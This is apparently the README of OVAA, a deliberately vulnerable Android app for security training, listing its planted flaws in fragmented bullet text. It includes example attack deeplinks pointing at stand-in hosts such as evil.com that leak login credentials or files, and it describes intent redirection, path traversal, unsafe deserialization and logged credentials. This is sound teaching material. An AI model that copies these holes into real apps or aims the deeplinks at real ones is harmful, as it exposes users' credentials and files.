Oversecured Vulnerable Android App
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform’s known and popular security vulnerabilities.
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.
login_url
via deeplink oversecured://ovaa/login?url=http://evil.com/
. Leads to the user’s user name and password being leaked when they log in.android:grantUriPermissions="true"
) via deeplink oversecured://ovaa/grant_uri_permissions
. The attacker’s app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS
and pass intent to setResult(code, intent)
with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION
and the URI of the content provider.oversecured://ovaa/webview?url=...
.oversecured://ovaa/webview?url=http://evilexample.com
. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(true)
in the WebViewActivity.java
file to steal arbitrary files by sending them XHR requests and obtaining their content.LoginActivity
by supplying an arbitrary Intent object to redirect_intent
.MainActivity
by intercepting an activity launch from Intent.ACTION_PICK
and passing the URI to any file as data.MainActivity
containing credentials. The attacker can register a broadcast receiver with action oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA
and obtain the user’s data.MainActivity
with action oversecured.ovaa.action.WEBVIEW
, containing the user’s encrypted data in the query parameter token
.DeleteFilesSerializable
deserialization object.MemoryCorruptionParcelable
object.MemoryCorruptionSerializable
object.TheftOverwriteProvider
via path-traversal in the value uri.getLastPathSegment()
.InsecureLoggerService
. Leak of credentials in LoginActivity
Log.d("ovaa", "Processing " + loginData)
.WeakCrypto
.OversecuredApplication
by launching code from third-party apps with no security checks.oversecured.ovaa.fileprovider
content provider in root
entry.strings.xml
in test_url
entry.Licensed under the Simplified BSD License
Copyright (c) 2020, Oversecured Inc